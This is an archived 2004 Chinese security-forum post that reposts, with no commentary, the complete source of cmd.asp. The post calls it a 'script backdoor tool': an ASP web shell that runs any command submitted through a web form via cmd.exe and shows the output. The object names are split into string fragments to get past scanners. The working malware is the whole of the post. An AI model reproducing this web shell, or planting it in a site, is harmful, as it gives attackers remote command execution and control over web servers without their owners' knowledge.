邪恶八进制信息安全团队技术讨论组 » 开源代码收集{ Software Source Code } » [转载]cmd.asp脚本后门工具源文件 [查看完整版本]

冰血封情 2004-6-26 18:52

[转载]cmd.asp脚本后门工具源文件

信息来源：暗域网络
文章作者：不详


[code]<%@ Language=VBscript %>
<%
Dim oscript
Dim oscriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile

On Error Resume Next

&#39; -- create the COM objects that we will be using -- &#39;
Set oscript = Server.CreateObject("WS"+"CRIP"+"T.SHELL")
Set oscriptNet = Server.CreateObject("WSCR"+"IPT.NET"+"WORK")
Set oFileSys = Server.CreateObject("Scr"+"iptin"+"g.FileS"+"ystemO"+"bject")

&#39; -- check for a command that we have posted -- &#39;
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then

&#39; -- Use a poor mans pipe ... a temp file -- &#39;
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)

End If

%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%= "\\" & oscriptNet.ComputerName & "\" & oscriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
&#39; -- Read the output from our command and remove the temp file -- &#39;
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>[/code]

查看完整版本: [转载]cmd.asp脚本后门工具源文件

© 1999-2008 EvilOctal Security Team